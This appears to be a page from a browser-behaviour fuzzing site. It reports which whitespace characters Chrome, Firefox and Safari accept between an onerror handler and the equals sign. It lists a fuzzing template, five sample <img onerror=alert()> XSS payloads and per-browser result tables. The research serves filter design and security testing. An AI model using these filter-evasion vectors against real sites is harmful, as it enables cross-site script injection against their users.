Character allowed after onerror event

I want to know which characters the browser accepts between an event handler and a equal sign.

Created on: Tuesday, April 2, 2024 at 9:47:31 AM

Updated on: Wednesday, July 17, 2024 at 10:52:20 AM

Vector type: XSS

Template used:
<img src=x onerror$[chr]=log($[i])>

Your browser was detected as:

Detecting... Detecting... Detecting... Detecting...

Sample payloads

<img src=x onerror =alert(9)>

<img src=x onerror
=alert(10)>

<img src=x onerror=alert(12)>

<img src=x onerror
=alert(13)>

<img src=x onerror =alert(32)>

Chrome 123.0.0.0 Unknown Unknown

Found 5 results

Show differences only?

Dec	Hex	Chr
9	09	HT

Dec	Hex	Chr
10	0a	LF

Dec	Hex	Chr
12	0c	FF

Dec	Hex	Chr
13	0d	CR

Dec	Hex	Chr
32	20	SPACE

Firefox 124.0 Unknown Unknown

Found 5 results

Show differences only?

Dec	Hex	Chr
9	09	HT

Dec	Hex	Chr
10	0a	LF

Dec	Hex	Chr
12	0c	FF

Dec	Hex	Chr
13	0d	CR

Dec	Hex	Chr
32	20	SPACE

Safari 17.4 Unknown Unknown

Found 5 results

Show differences only?

Dec	Hex	Chr
9	09	HT

Dec	Hex	Chr
10	0a	LF

Dec	Hex	Chr
12	0c	FF

Dec	Hex	Chr
13	0d	CR

Dec	Hex	Chr
32	20	SPACE